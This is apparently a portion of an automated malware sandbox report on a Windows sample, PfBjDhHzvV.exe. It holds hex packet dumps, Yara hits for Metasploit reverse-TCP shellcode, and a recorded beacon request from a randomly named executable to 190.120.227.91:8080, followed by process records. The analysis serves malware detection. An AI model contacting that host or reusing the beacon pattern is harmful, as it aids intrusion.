                                                                                                                                                                                                                                  Accept-CH: viewport-width
                                                                                                                                                                                                                                  Accept-CH: dpr
                                                                                                                                                                                                                                  Accept-CH: device-memory
                                                                                                                                                                                                                                  Accept-CH: rtt
                                                                                                                                                                                                                                  Accept-CH: downlink
                                                                                                                                                                                                                                  Accept-CH: ect
                                                                                                                                                                                                                                  Accept-CH: ua
                                                                                                                                                                                                                                  Accept-CH: ua-full-version
                                                                                                                                                                                                                                  Accept-CH: ua-platform
                                                                                                                                                                                                                                  Accept-CH: ua-platform-version
                                                                                                                                                                                                                                  Accept-CH: ua-arch
                                                                                                                                                                                                                                  Accept-CH: ua-model
                                                                                                                                                                                                                                  Accept-CH: ua-mobile
                                                                                                                                                                                                                                  Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                  X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                  X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                  X-Domain: padrup.com
                                                                                                                                                                                                                                  X-Subdomain:
                                                                                                                                                                                                                                  Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                  Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:15.013797045 CEST1236INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                  Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTIzNzIxNC42NDQ6MTEyZDZkYjRhYzk3Nzc1MjUyZGMyZTI3Zjk2ZjFmZjBlMDEzODVlNzZiNDkwYjJkMDNlMjFkYzViYzMyMGI1NDo2NzEyMTBkZTlkMzg0';var
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:15.013926029 CEST760INData Raw: 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 6f 6c 65
                                                                                                                                                                                                                                  Data Ascii: = '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  39192.168.2.762535190.120.227.9180806152C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:15.037476063 CEST168OUTGET /sobakavolos.gif?3fa5859=600644385 HTTP/1.1
                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                  Host: 190.120.227.91:8080
                                                                                                                                                                                                                                  Cache-Control: no-cache


                                                                                                                                                                                                                                  Statistics

                                                                                                                                                                                                                                  CPU Usage

                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                  Memory Usage

                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                                                  Behavior

                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                  System Behavior

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                                  Start time:03:38:12
                                                                                                                                                                                                                                  Start date:18/10/2024
                                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\PfBjDhHzvV.exe"
                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                  File size:2'969'674 bytes
                                                                                                                                                                                                                                  MD5 hash:31BBB64AA3C1753CD99C865869B58023
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                  • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000003.1375059861.0000000004500000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: Windows_Trojan_Metasploit_4a1c4da8, Description: Identifies Metasploit 64 bit reverse tcp shellcode., Source: 00000000.00000003.1375059861.0000000004500000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                  • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.2246784875.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: Windows_Trojan_Metasploit_4a1c4da8, Description: Identifies Metasploit 64 bit reverse tcp shellcode., Source: 00000000.00000002.2246784875.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                  • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.2233936236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: Windows_Trojan_Metasploit_4a1c4da8, Description: Identifies Metasploit 64 bit reverse tcp shellcode., Source: 00000000.00000002.2233936236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                                                                  Start time:03:38:12
                                                                                                                                                                                                                                  Start date:18/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\fontdrvhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:"fontdrvhost.exe"
                                                                                                                                                                                                                                  Imagebase:0x7ff6080a0000
                                                                                                                                                                                                                                  File size:827'408 bytes
                                                                                                                                                                                                                                  MD5 hash:BBCB897697B3442657C7D6E3EDDBD25F
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:3
                                                                                                                                                                                                                                  Start time:03:38:13
                                                                                                                                                                                                                                  Start date:18/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\dllhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                                                                                                                  Imagebase:0x7ff7d8730000
                                                                                                                                                                                                                                  File size:21'312 bytes
                                                                                                                                                                                                                                  MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                                                                  Start time:03:38:13
                                                                                                                                                                                                                                  Start date:18/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\fontdrvhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:"fontdrvhost.exe"
                                                                                                                                                                                                                                  Imagebase:0x7ff6080a0000
                                                                                                                                                                                                                                  File size:827'408 bytes
                                                                                                                                                                                                                                  MD5 hash:BBCB897697B3442657C7D6E3EDDBD25F
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:5
                                                                                                                                                                                                                                  Start time:03:38:14
                                                                                                                                                                                                                                  Start date:18/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\dwm.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:"dwm.exe"
                                                                                                                                                                                                                                  Imagebase:0x7ff74b010000
                                                                                                                                                                                                                                  File size:94'720 bytes
                                                                                                                                                                                                                                  MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:6
                                                                                                                                                                                                                                  Start time:03:38:17
                                                                                                                                                                                                                                  Start date:18/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\sihost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:sihost.exe
                                                                                                                                                                                                                                  Imagebase:0x7ff77a4d0000
                                                                                                                                                                                                                                  File size:111'616 bytes
                                                                                                                                                                                                                                  MD5 hash:A21E7719D73D0322E2E7D61802CB8F80
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                                                                  Start time:03:38:18
                                                                                                                                                                                                                                  Start date:18/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                                                                                                                                                                  Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                                                                  Start time:03:38:18
                                                                                                                                                                                                                                  Start date:18/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService
                                                                                                                                                                                                                                  Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                                                                  Start time:03:38:19
                                                                                                                                                                                                                                  Start date:18/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\ctfmon.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:"ctfmon.exe"
                                                                                                                                                                                                                                  Imagebase:0x7ff7d83b0000
                                                                                                                                                                                                                                  File size:11'264 bytes
                                                                                                                                                                                                                                  MD5 hash:B625C18E177D5BEB5A6F6432CCF46FB3
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:10
                                                                                                                                                                                                                                  Start time:03:38:19
                                                                                                                                                                                                                                  Start date:18/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                                                                  Imagebase:0x7ff70ffd0000
                                                                                                                                                                                                                                  File size:5'141'208 bytes
                                                                                                                                                                                                                                  MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:11
                                                                                                                                                                                                                                  Start time:03:38:25
                                                                                                                                                                                                                                  Start date:18/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                                                                                                                                                  Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:13
                                                                                                                                                                                                                                  Start time:03:38:25
                                                                                                                                                                                                                                  Start date:18/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                                                  Imagebase:0x7ff69c330000
                                                                                                                                                                                                                                  File size:793'416 bytes
                                                                                                                                                                                                                                  MD5 hash:5CDDF06A40E89358807A2B9506F064D9
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:14
                                                                                                                                                                                                                                  Start time:03:38:30
                                                                                                                                                                                                                                  Start date:18/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                                                  Imagebase:0x7ff6bd830000
                                                                                                                                                                                                                                  File size:103'288 bytes
                                                                                                                                                                                                                                  MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:15
                                                                                                                                                                                                                                  Start time:03:38:31
                                                                                                                                                                                                                                  Start date:18/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                                                                                  Imagebase:0x7ff7fd570000
                                                                                                                                                                                                                                  File size:3'671'400 bytes
                                                                                                                                                                                                                                  MD5 hash:5E1C9231F1F1DCBA168CA9F3227D9168
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:16
                                                                                                                                                                                                                                  Start time:03:38:38
                                                                                                                                                                                                                                  Start date:18/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
                                                                                                                                                                                                                                  Imagebase:0x7ff72cfc0000
                                                                                                                                                                                                                                  File size:1'663'328 bytes
                                                                                                                                                                                                                                  MD5 hash:9B8DE9D4EDF68EEF2C1E490ABC291567
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:18
                                                                                                                                                                                                                                  Start time:03:38:47
                                                                                                                                                                                                                                  Start date:18/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                                                  Imagebase:0x7ff6bd830000
                                                                                                                                                                                                                                  File size:103'288 bytes
                                                                                                                                                                                                                                  MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:19
                                                                                                                                                                                                                                  Start time:03:38:48
                                                                                                                                                                                                                                  Start date:18/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                                                  Imagebase:0x7ff6bd830000
                                                                                                                                                                                                                                  File size:103'288 bytes
                                                                                                                                                                                                                                  MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:20
                                                                                                                                                                                                                                  Start time:03:38:49
                                                                                                                                                                                                                                  Start date:18/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\smartscreen.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\System32\smartscreen.exe -Embedding
                                                                                                                                                                                                                                  Imagebase:0x7ff7ab740000
                                                                                                                                                                                                                                  File size:2'378'752 bytes
                                                                                                                                                                                                                                  MD5 hash:02FB7069B8D8426DC72C9D8A495AF55A
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:21
                                                                                                                                                                                                                                  Start time:03:38:50
                                                                                                                                                                                                                                  Start date:18/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\ApplicationFrameHost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\ApplicationFrameHost.exe -Embedding
                                                                                                                                                                                                                                  Imagebase:0x7ff7df270000
                                                                                                                                                                                                                                  File size:78'456 bytes
                                                                                                                                                                                                                                  MD5 hash:D58A8A987A8DAFAD9DC32A548CC061E7
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:22
                                                                                                                                                                                                                                  Start time:03:38:51
                                                                                                                                                                                                                                  Start date:18/10/2024
                                                                                                                                                                                                                                  Path:C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:"C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe" -ServerName:App.AppXc75wvwned5vhz4xyxxecvgdjhdkgsdza.mca
                                                                                                                                                                                                                                  Imagebase:0x7ff755410000
                                                                                                                                                                                                                                  File size:19'456 bytes
                                                                                                                                                                                                                                  MD5 hash:6C44453CD661FC2DB18E4C09C4940399
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:23
                                                                                                                                                                                                                                  Start time:03:38:52
                                                                                                                                                                                                                                  Start date:18/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                                                  Imagebase:0x7ff6bd830000
                                                                                                                                                                                                                                  File size:103'288 bytes
                                                                                                                                                                                                                                  MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:24
                                                                                                                                                                                                                                  Start time:03:38:52
                                                                                                                                                                                                                                  Start date:18/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca
                                                                                                                                                                                                                                  Imagebase:0x7ff6b6580000
                                                                                                                                                                                                                                  File size:19'232 bytes
                                                                                                                                                                                                                                  MD5 hash:F050189D49E17D0D340DE52E9E5B711F
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:25
                                                                                                                                                                                                                                  Start time:03:38:53
                                                                                                                                                                                                                                  Start date:18/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0x4
                                                                                                                                                                                                                                  Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:26
                                                                                                                                                                                                                                  Start time:03:38:54
                                                                                                                                                                                                                                  Start date:18/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\backgroundTaskHost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppX4325622ft6437f3xfywcfxgbedfvpn0x.mca
                                                                                                                                                                                                                                  Imagebase:0x7ff644d60000
                                                                                                                                                                                                                                  File size:19'776 bytes
                                                                                                                                                                                                                                  MD5 hash:DA7063B17DBB8BBB3015351016868006
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:27
                                                                                                                                                                                                                                  Start time:03:38:54
                                                                                                                                                                                                                                  Start date:18/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                                                  Imagebase:0x7ff6bd830000
                                                                                                                                                                                                                                  File size:103'288 bytes
                                                                                                                                                                                                                                  MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:28
                                                                                                                                                                                                                                  Start time:03:38:55
                                                                                                                                                                                                                                  Start date:18/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                                                                                                                                                                                                                                  Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:29
                                                                                                                                                                                                                                  Start time:03:38:56
